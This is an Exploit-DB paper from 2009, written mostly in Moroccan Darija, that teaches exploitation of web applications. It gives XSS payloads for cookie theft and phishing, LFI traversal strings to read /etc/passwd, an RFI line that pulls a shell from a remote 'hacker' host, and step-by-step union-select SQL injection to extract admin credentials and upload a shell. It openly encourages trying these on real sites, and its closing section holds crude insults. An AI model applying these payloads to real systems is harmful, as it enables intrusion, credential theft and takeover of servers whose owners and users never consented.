[Moroccan] Web Vulnerabilities Exploiting

EDB-ID:

13564

CVE:

N/A


Author:

Mr.aFiR

Type:

papers


Platform:

AIX

Date:

2009-12-17


#####################################################################
##                                _______   ____                   ##
##          __ ___               / _____ \ /  __ \                 ##
##         /      \  _ _     ___ | |___ |/ | |  ) )                ##
##        |  Y  Y  \| V_\   / _ Y|  __ |(_)| |_/ /      [A]        ##
##        |__|__|__ \ |  ()| (_] | |  \|| ||  __ \                 ##
##                 \/_/     \___ | |    | || |  ) |                ##
##                              \|/     |_/|_/  |/                 ##
##                                                                 ##
#####################################################################
##           [Morocco] Web Vulnerabilities Exploiting              ##
##                          -+-+-+-+-+-                            ##
##             Created By Mr.aFiR (Moroccan Hacker)                ##
##                    Email: q-_@hotmail.com                       ##
##                     Website: www.aFiR.me                        ##
##                      (c) -- 18/12/2oo9                          ##
#####################################################################
# To read this with a good style, use Notepad++ & select the from language menu "MS INI file".
# Bach t9raw had fichier b style zwin, halloh b notepad++ & diro f language "MS INI file".
#
##-Mohtawayate
 | #
 | #-M09DIMA
 | #-3ARD
 | | #
 | | #-XSS (all)
 | | #-LFI (php)
 | | #-RFI (php)
 | | #-MySQLi (php)
 | | #-MsSQLi (asp,aspx)
 | |
 | #-KHATIMA
 | #-L3z
 |
 |-> Bismy Allah nbdaw :

[!] I. M09ADIMA :
         Ch7al men merra tan dakhlo l chi site tay tla3 lina fih error
       o matan fahmo fih walo (hada bansba l chi nass :) ).
       Lyom jina n7abso had l problème. bach twaliw t3arfo kifache t3amlo
       m3a les error khossosan f PHP.
       Yallah khaliwna nbdaw 3ala barakati Allah.

[!] II. 3ARD :
         
    [~] a. XSS (all):
              
              XSS (Cross Site Scripting) howa ashal tagharat & li kayna f bzaf d les sites 
           li menhom des sites kbar bhal les banks ola charikat l kbar comme hotmail &
           facebook. O had XSS sahla 7ddar 39lak chwiya m3aya :
           Ex.:
            parfois tanl9aw chi lien b7al hakka :

                   http://server/login.php?message=Invalid Login

            & tanl9aw dik "Invalid Login" maktooba f chi blasa f la page.
            Hadchi tay3ni ananna n9dro nt7kmo fiha & nghayroha ri men lien.
            njarbo :

                   http://server/login.php?message=<script>alert('aFiR');</script>
            
            ila mchat 7ta 3ta fenetre dial message fih "aFiR" rah hadik hiya li 
            tatsma XSS, 7it biha imkan lik tddi les cookies dial l admin ola users
            dial chi site.
           Lmanafi3 dial XSS : * tchfar biha les cookies (Cookies Stealing)
                               * tdir fiha iframe dial login (iframe Attacks)
                               * dir biha redirection l scam dialk (Phishing Redirections)

           Hadi Salina M3aha, Ntmnna annak fhamti chi haja, sinon chrab lb7ar.

    [~] b. LFI (php):

             LFI (Local File Include) hadi chwiya 3yana mais wakha hakkak naf3a f ba3d
           servers hit biha imkan lina n9raw ay fichier bchart maykonch PHP.
           Ex.:
                   http://server/index.php?lang=fr
            hadi tanradoha :
                   http://server/index.php?lang=aFiR
            
            Ila 3tak error bhal hakka :
           
                   Warning : include('languages/aFiR.php') .../home/user/www/index.php on line x
                             require('languages/aFiR.php') .../home/user/www/index.php on line x

            rah imkan t exploitih & t9ra "/etc/passwd"

                   http://server/index.php?lang=../../../../etc/passwd%00

            ila kan safe_mode=OFF rah radi ikharjo lik les users dial server
            & dik "%00" hiya bach tan raddo ".php" NULL y3ni matatb9ach

           Lmanafi3 dial had l Vuln hiya anana n9raw /etc/passwd & nkhadmo bih
           FTP Burte Force Attack li biha imkan njibo des login FTP.

           Ila mafhamti hadi Tfi dak l pc o nod men temma | YALLAH! | :D

    [~] c. RFI (php):

             FRI (Remote File Include) hadi 3akss lowla, hadi fiha imma byad imma khal.
           fl error dialha matykon hta dossier & imkan aussi hna ndiro LFI.
           Ex.:
                   http://server/index.php?page=news
            tanradoha :
                   http://server/index.php?page=aFiR
            tat3ti error comme ça :
                   Warning : include('aFiR.php') ...
                   Warning : require('aFiR.php') ...

            hada tay3ni imkan tkon RFI
            nraj3o l lien :

                   http://server/index.php?page=http://hacker/shell.txt?

            ila t executa lik shell llah iskhar, sinon rah Safe_mode=ON :s
            & bach nraj3o ".php" NULL f RFI tan diro "?" f la fin d lien

    [~] d. MySQLi (php):

             MySQL Injection i9dar tjikom s3iba ila ma3mrkom khdamtoha, mais hiya raha sahla.
           Mli tadkhol l chi site matala f lien dial /news.php?id=9
           malli trad lien /news.php?id=9' radi itla3 error !
           ja men ana l mobarmij ma3tach chorot l $id !
           & ktab direct bhal haka :

                      $query = mysql_query("SELECT * FROM news WHERE id=$id");

           y3ni imkan lina nghayro lmasar dial had l query & biha njibo login dial admin
           awal haja tan9albo 3la 3adad la3mida li radi n diro ba3d "union select"
           tandiro /news.php?id=9 order by 1-- Onb9aw radyin tal3ni tanzido f dik "1"
           hta itla3 l error example tla3 error mli wslna "14" 3adad la3mida howa "13"
           daba hna 3arfin blli "13" howa 3adad l a3mida tandiro :
           /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--
           daba radi n3arfo la3mida lmosaba ohiya l ar9am li radi tban f la page
           daba tayji dawr dial ta5min dial name dial table fach kayn login dial l admin
           /news.php?id=-9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from table_name--
           table_name tan 5amnoh men rassna i9dar ikon admin, users, user, administrator ...
           mli tanjarbo f ta5min kif i5tafi l error = rah ta5min S7i7 ;)
           Après ja ta5min dial login ol password dial admin, example 4 tayban f la page:
           /news.php?id=-9 union select 1,2,3,col_name,5,6,7,8,9,10,11,12,13 from table_name--
           col_name hiya ta5min dial login ola password :
           Login : login, user, username, user_name, name, auth,...
           Password : password, pass, passwd,...
           Aprés matan 3arfo login tan9albo 3la Admin Panel li menha imkan n uploadiw shell dialna.
            ______________________________________________________________________________________________
            |* Hado des commandes khassin ri b MySQL :                                                    |  
            |_____________________________________________________________________________________________|
                    | version()  = tan3arfo biha la version dial Mysql server                             |
                    | datadir()  = tan3arfo biha l masar dial mysql f server                              |
                    | concat()   = tandamjo biha bzaf d la3mida f 1 L3amood Ex: concat(user,0x3a,pass)    |
                    | load_file()= tan9raw  biha les fichier Ex: load_file('/etc/passwd')                 |
                    |_____________________________________________________________________________________|                      

    [~] e. MsSQLi (asp,aspx):

             Bnesba l MsSQLi (MicroSoft SQL injection) tan tab3o nafss les etape dial MySQLi ri chi chorot :

           1. "union select" = "union all select" (far9 bsiit).
           2. "--" = "#" (partya dial commentaire bach n anulliw ma ba3d la query dialna).
           3. F MsSQL les numero dial la3mida li m infectyin mataybanoch hta nkhamno table_name.
           4. F hna matan khadmoch b les command dial mysql li 3titkom f lfo9.

           Daba Salina, Lmli7 Ba3 Ora7.

[!] III. KHATIMA :

             Ntmnna annakom fhamto chi haja fhad l cours d darija :) !
           Ktabt dinmo bhal incha2 dial Arabic :D !
           Li mafham ttawzza il7ag mo 7san lih ! YALLAH L7AG MOK ! hhhhhhhhh
           9addit had Ze3t b darij awalan bach ifahmo wlad l blad & tanian bach
           hta chi 9rd men dok L9rooda hachakom mayfham iwalliw ki LHmir
           (cambo mayfham walo) :) khashom ri lodnin.
           Akhir Haja radi tnod men dak l pc radi tamchi tn3ass onta tatfkar f 
           hadchi kif tfi9 sbbaH 3la l pc & 7awel tjrab ga3 ach dkhalti l rassk,
           iwa nod men temma 9bal man khraj lik men l ecran :D.
           Yallah Tla7o !

[!] IV. L3z :

             L3z lik olga3 li 9ra had l paper & ntmna i3jabkom & tfahmoh mzian.
           LLi mafham chi 7aja ra l website dialy sift menno ton message ;)
           Finally, L3z to all my friends lli menhom :
            "Dr.Crypter(3chiri), Love511(3ami), Dr.BoB-Hacker(sadi9i), ****(MyLove)..."
           Li nsit madert smito hna, maykhafch rakom fl bal ;)
           Nchofkom Next Time m3a chi haja jdida ;)
		   
---------------------------------------------------------------------------------------------------
[x] Author  : aFiR Abdel (Mr.aFiR)
[x] Email   : q-_[at]hotmail[dot]com
[x] Website : www.aFiR.me
# if you have something to tell me, only contact me ;)
---------------------------------------------------------------------------------------------------